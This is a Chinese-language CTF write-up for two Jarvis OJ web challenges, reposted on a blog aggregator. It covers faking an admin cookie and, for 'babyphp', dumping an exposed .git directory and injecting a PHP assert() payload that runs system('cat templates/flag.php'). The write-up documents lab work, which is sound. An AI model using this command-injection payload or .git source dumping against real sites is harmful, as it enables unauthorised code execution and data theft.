61dctf writeup
来源:互联网 发布:淘宝免费推广软件 编辑:程序博客网 时间:2024/05/16 14:17
**
admin
**
打开页面发现。。。。就一个Hello World= =,查看源代码也无果,那么抓个包吧= =
emmmm,发现什么也没有,那么就robots.txt看看吧,发现果然有东西
web.jarvisoj.com:32792/robots.txt
访问这个后发现。。。。flag{hello guest}。。。。嗯。。。被骗了,提交这个没有用
那么在这个页面抓个包,再改一次admin= 1即可
**
babyphp
**
查看源码,发现有个hint耶。。。。看来是page传参
<!--<li ><a href="?page=flag">My secrets</a></li> -->
根据提示,有个git,于是想到了.git漏洞
参考博客 http://www.freebuf.com/sectool/66096.html
于是可以导出源码
python GitHack.py web.jarvisoj.com:32798/.git
可以找到index.php中的源代码
<?phpif (isset($_GET['page'])) { $page = $_GET['page'];} else { $page = "home";}$file = "templates/" . $page . ".php";assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");assert("file_exists('$file')") or die("That file doesn't exist!");?>
看来是个绕过。。。。
构造payload
','..')===False and system('cat templates/flag.php');//
于是就变成了
assert("strpos('"templates/" . ','..')===False and system('cat templates/flag.php');// . ".php"', '..') === false")
把前面的strpos函数给闭合了,调用系统命令查看template目录下的flag.php,再把后面注释掉
flag就出来了,美滋滋啊~~~
阅读全文
0 0
- 61dctf writeup
- 171127 总结-DCTF线下赛经验教训
- ACTF writeup
- ACTF writeup
- ISCC2014 writeup
- hctf2014 writeup
- UCTF WriteUp
- ISCC2014 writeup
- ISCC2016Basic Writeup
- writeup-flag
- writeup-passcode
- writeup-random
- writeup-coin1
- writeup-khaleesi
- writeup-web
- writeup-woo
- 校赛 writeup
- 校赛writeup
- Mybatis+Mysql 批量插入的时候返回主键ID
- 改变•力量----第二届企业创新生态圈大会隆重召开
- 重磅预告:7位权威专家告诉你区块链的前沿与热点 | CCF-ADL 持续开课中
- 沸点资本于光东:新锐投资机构想要变道超车,必须学会陪创业者贴地飞行 | CCF-GAIR 2017
- 制霸全球供应链?马斯克:特斯拉将在美国再建两到三座超级工厂
- 61dctf writeup
- 二叉树系列
- text标签及其属性
- Pomelo(九) 运行原理及WebStorm调试
- 时隔一年 Vijay Kumar 再登 GAIR 讲台,讲述自动化的技术与社会挑战(上) | CCF-GAIR 2017
- Uber 员工生存状态大调查:狼性文化成了员工无法承受之重
- 查询(python 版)
- linux基本命令--ls
- Tomcat配置虚拟主机